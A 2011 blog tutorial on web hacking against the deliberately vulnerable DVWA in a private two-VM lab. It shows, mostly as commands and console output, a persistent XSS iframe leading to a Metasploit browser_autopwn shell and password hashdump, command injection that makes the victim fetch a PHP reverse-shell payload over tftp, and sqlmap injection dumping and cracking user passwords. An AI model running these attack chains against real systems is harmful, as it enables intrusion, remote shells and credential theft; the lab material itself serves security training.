Pages

26 November 2011

How to learn with Damn Vulnerable Web Application

Hello and welcome. Today I’ll be writing a tutorial on the basics of web-hacking. To make the learning experience more enjoyable we’ll be using “Damn Vulnerable Web Application (DVWA)” which is designed as a web security learning platform. I will only be demonstrating three scenarios which lead to a server compromise :  (1) Persistent XSS + IFRAME, (2) Command Execution and (3) MySQL Injection. There are many more test cases which can be examined but I leave that up to the diligent readers own discretion. You can download “Damn Vulnerable Web Application (DVWA)” HERE.  Setting up this lab is quite easy so don’t hesitate to try it for yourself…

Thian Septian Sevenfoldarchuleta this for you my friends......

Ok let’s get to the good stuff, I’ll be using two VM’s:
Attacker : Backtrack 5 =>  192.168.111.129
Victim : Windows XP =>  192.168.111.130


1. Persistent XSS + IFRAME
Cross Site Scripting, isn’t always appreciated as a legitimate attack vector but as we’ll see persistent XSS can have some nasty implications. We’ll start of by browsing to the “Sign Guestbook” page.  Due to unsanitized user input we are able to inject client-side scripts into the message box.  Using an IFRAME we can redirect any user visiting this Guestbook to our malicious server. In the screenshot below you can see our “innocent” message being posted. You should take note of the URI Path being used "/innocent".

Code :  http://pastebin.com/Wpdv2Ps0


Ok so far so good, now let’s set up a client-side exploit server for our unsuspecting victim to connect to. First of all make sure your Backtrack machine isn’t already using port 80 (for example if you’re hosting an Apache server). Fire up msfconsole and select the browser_autopwn module, take care to configure the options properly. Below you can see my sample configuration (be sure to set the correct URI Path)…

msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.111.129  yes       The IP address to use for reverse-connect payloads
   SRVHOST     192.168.111.129  yes       The local host to listen on. 
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate
   SSLVersion  SSL3             no        Specify the version of SSL that should be used
   URIPATH     /innocent        no        The URI to use for this exploit (default is random)
   
msf  auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2011-11-09 05:36:52 +0100
[*] Done in 1.041111216 seconds

[*] Starting exploit modules on host 192.168.111.129...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.111.129:80/EKlBI
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload 
    java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/hhbLra
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.111.129:80/JaTFlOKmWUq

[...snip...]

[*] --- Done, found 23 exploit modules

[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.

Perfect, everything is set-up. All we have to do now is wait for our unsuspecting victim to view the Guestbook page. As you can see in the screenshot below, when our victim views the page he/she cannot visually see anything malicious about our post (if you like you can even insert a real message before your IFRAME). Even though nothing fishy seems to be going on our victim is redirected to our exploit server which leverages browser exploits to get shell access.


[*] Using URL: http://192.168.111.129:80/innocent
[*] Server started.
[*] 192.168.111.130  Browser Autopwn request '/innocent'
[*] 192.168.111.130  Browser Autopwn request 
    '/innocent?sessid=TWljcm9zb2Z0IFdpbmRvd3M6WFA6U1AwOmVuLXVzOng4NjpNU0lFOjYuMDo%3d'
[*] 192.168.111.130  JavaScript Report: Microsoft Windows:XP:SP0:en-us:x86:MSIE:6.0:
[*] Responding with exploits
[*] Sending MS03-020 Internet Explorer Object Type to 192.168.111.130:1083...
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.130:1084 (target: IE 6 
    SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:3333 -> 192.168.111.130:1085) at 2011-11-09 
    05:38:35 +0100
[*] Session ID 1 (192.168.111.129:3333 -> 192.168.111.130:1085) processing InitialAutoRunScript 
    'migrate -f'
[*] Current server process: iexplore.exe (3460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3684
[+] Successfully migrated to process 

msf  auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information                              Connection
  --  ----                   -----------                              ----------
  1   meterpreter x86/win32  FLUXX-J18BEF9YQ\Owner @ FLUXX-J18BEF9YQ  192.168.111.129:3333 -> 
                                                                      192.168.111.130:1085

msf  auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:fc4305db8da15f1e2404624e4bf5045f:bfcea702c343c38e5598448fd52782e8:::
Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:d515e27c8b5a477fe5189a1377c6c7e2:::
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                          Path
 ---   ----               ----  -------  ----                          ----
 0     [System Process]                                                
 1000  svchost.exe        x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\System32\svchost.exe
 1056  svchost.exe        x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\svchost.exe
 1340  explorer.exe       x86   0        FLUXX-J18BEF9YQ\Owner         C:\WINDOWS\Explorer.EXE

[...snip...]

 636   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 648   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 808   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 908   svchost.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe

meterpreter > migrate 648
[*] Migrating to 648...
[*] Migration completed successfully.
meterpreter > shell
Process 3952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.111.130
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 

C:\WINDOWS\system32>


2. Command Execution
If we browse to the “Command Execution” tab we are presented with a small PHP utility that allows us to ping remote machines. After a bit of fooling around I discovered you can make the utility execute multiple commands by chaining them together with the “&” character. Our end-game ploy in this demo is to remotely execute a PHP exploit. So first of all we have to find a way to transfer our malicious payload to the remote machine.  There are many ways to do this: ftp, tftp, inline transfer, web browser,… To get an idea of what we have to work with we can get a directory list of C:\WINDOWS\system32 which will contain binaries of the programs that are installed on the remote server. As we can see below we are in luck, tftp is installed on the remote machine (this is most practical transfer method for non-interactive command line execution).

Code : & cd ../../../../../../../../WINDOWS/system32 & dir
       
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] target_name

Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live.
    -v TOS         Type Of Service.
    -r count       Record route for count hops.
    -s count       Timestamp for count hops.
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.

 Volume in drive C has no label.
 Volume Serial Number is 7833-0FA5

 Directory of C:\WINDOWS\system32

[...snip...]

08/29/2002  08:00 PM            71,168 telnet.exe
08/29/2002  08:00 PM           343,552 termmgr.dll
08/29/2002  08:00 PM           200,192 termsrv.dll
08/29/2002  08:00 PM            16,896 tftp.exe
08/29/2002  08:00 PM           384,000 themeui.dll
08/29/2002  08:00 PM            90,112 timedate.cpl
08/29/2002  08:00 PM             4,048 timer.drv

[...snip...]

08/29/2002  08:00 PM             9,728 xolehlp.dll
08/29/2002  08:00 PM           187,904 xpsp1res.dll
08/29/2002  08:00 PM           316,416 zipfldr.dll
            1635 File(s)    254,218,638 bytes
              39 Dir(s)   2,506,862,592 bytes free


Let’s  go back to our Backtrack machine to create our PHP payload and set up a tftp  server to host it.

root@bt:~# atftpd --daemon --port 69 /tmp/
root@bt:~# netstat -anup
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 192.168.111.129:53569   192.168.111.1:53        ESTABLISHED 1496/firefox-bin
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1797/dhclient   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1075/dhclient3  
udp        0      0 0.0.0.0:69              0.0.0.0:*                           2004/atftpd

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 O

       Name: PHP Meterpreter, PHP Reverse TCP stager
     Module: payload/php/meterpreter/reverse_tcp
    Version: 12196, 12196
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 1286
       Rank: Normal

Provided by:
  egypt 

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.111.129  yes       The listen address
LPORT  9988             yes       The listen port

Description:
  Reverse PHP connect back stager with checks for disabled functions, 
  Run a meterpreter server in PHP

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R > /tmp/evil.php
root@bt:~# ls -l /tmp/
total 28
drwx------ 2 root root 4096 2011-11-09 04:17 kde-root
drwx------ 2 root root 4096 2011-11-09 04:17 ksocket-root
drwx------ 2 root root 4096 2011-11-09 04:17 orbit-root
drwx------ 2 root root 4096 2011-11-09 04:17 pulse-3uavuaOb9vyJ
-rw------- 1 root root  141 2011-11-09 04:17 serverauth.pWwJb7S99J
drwx------ 2 root root 4096 2011-11-09 04:17 ssh-ZXZzWw1229
-rw-r--r-- 1 root root 1286 2011-11-09 04:44 evil.php


Ok we’re all set let’s return to our “Command Execution” tab. We are going to make the remote machine use tftp to download out payload and place it in the web root. Take note that xampp’s web root is located in C:\xampp\htdocs. As we can see in the screenshot below our payload has successfully been downloaded. Once this has been accomplished we can use the attackers browser to open http://192.168.111.130/evil.php,this will then automatically execute our payload.

Code : & cd c:\xampp\htdocs & tftp -i 192.168.111.129 GET evil.php


msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.111.129  yes       The listen address
   LPORT  9988             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:9988 
[*] Starting the payload handler...
[*] Sending stage (38553 bytes) to 192.168.111.130
[*] Meterpreter session 1 opened (192.168.111.129:9988 -> 192.168.111.130:1053) at 2011-11-09 
    05:16:13 +0100


meterpreter > shell
Process 3156 created.
Channel 0 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\apache>


3. MySQL Injection
To wrap up the tutorial let’s have a look at MySQL injection. To follow this tutorial in Backtrack you’ll have to install a firefox plug-in called Tamper Data, it will allow you to intercept and modify HTTP/HTTPS headers and POST parameters (big up to anyone who has modified some poorly configured online poll hehe). Browse to the “SQL Injection” tab, start Tamper Data, enter a number in the field (1 to 5) and press enter. Tamper Data will alert you that it has intercepted a request, allow it to continue and then examine the contents of the data. You should see something like in the screenshot below.


Copy the entire content of the “Cookie” field. We will be using this data as a parameter for sqlmap. Achieving injection is pretty easy, observe the syntax below…

root@bt:/pentest/database/sqlmap# ./sqlmap.py 
--url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low'

[...snip...]

sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 3474 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,112,117,58),(SELECT (CASE WHEN
   (3474=3474) THEN 1 ELSE 0 END)),CHAR(58,113,101,109,58),FLOOR(RAND(0)*2))x FROM 
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iXZd'='iXZd&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,106,112,117,58),IFNULL(CAST(CHAR(75,115,118,88,119,75,
    101,111,85,115) AS CHAR),CHAR(32)),CHAR(58,113,101,109,58)), NULL# AND 'fpda'='fpda&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'ZrXF'='ZrXF&Submit=Submit
---

[06:16:54] [INFO] manual usage of GET payloads requires url encoding
[06:16:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[06:16:54] [INFO] Fetched data logged to text files under /pentest/database/sqlmap/output/192.168.111.130

[*] shutting down at: 06:16:54

So injection is successful, you can see that we used the data recovered from Tamper Data (note that without this cookie-data injection cannot be achieved). If we add the --dbs tag to the command above we will get a list of the available databases, as shown below.

[...snip...]

[06:19:36] [INFO] fetching database names
available databases [8]:
[*] cdcol
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[...snip...]

After some enumeration, I discovered that the Database “dvwa” contained a Table named “users”. Dumping this Table reveals a list of users and their encrypted passwords. I then proceeded to run a dictionary based attack on these hashes and in less than 30 seconds they were all decrypted.



root@bt:/pentest/database/sqlmap# ./sqlmap.py 
--url='http://192.168.111.130/vulnerabilities/sqli/?id=1&Submit=Submit#' 
--cookie='PHPSESSID=scmkpnhd6a9smq30rvjkse6ts0; security=low' -D dvwa -T users --dump

[...snip...]

+---------------------------------+------------+-----------+----------------------------------+---------+
| avatar                          | first_name | last_name | password                         | user    |
+---------------------------------+------------+-----------+----------------------------------+---------+
| dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 | admin   |
| dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 | smithy  |
| dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 | pablo   |
| dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b | 1337    |
| dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 | gordonb |
+---------------------------------+------------+-----------+----------------------------------+---------+

+---------+      +------------+
| user    |      | passwords  |
+---------+      +------------+
| admin   | ===> |  password  |
| smithy  | ===> |  password  |
| pablo   | ===> |  letmein   |
| 1337    | ===> |  charley   |
| gordonb | ===> |  abc123    |
+---------+      +------------+


0 comments: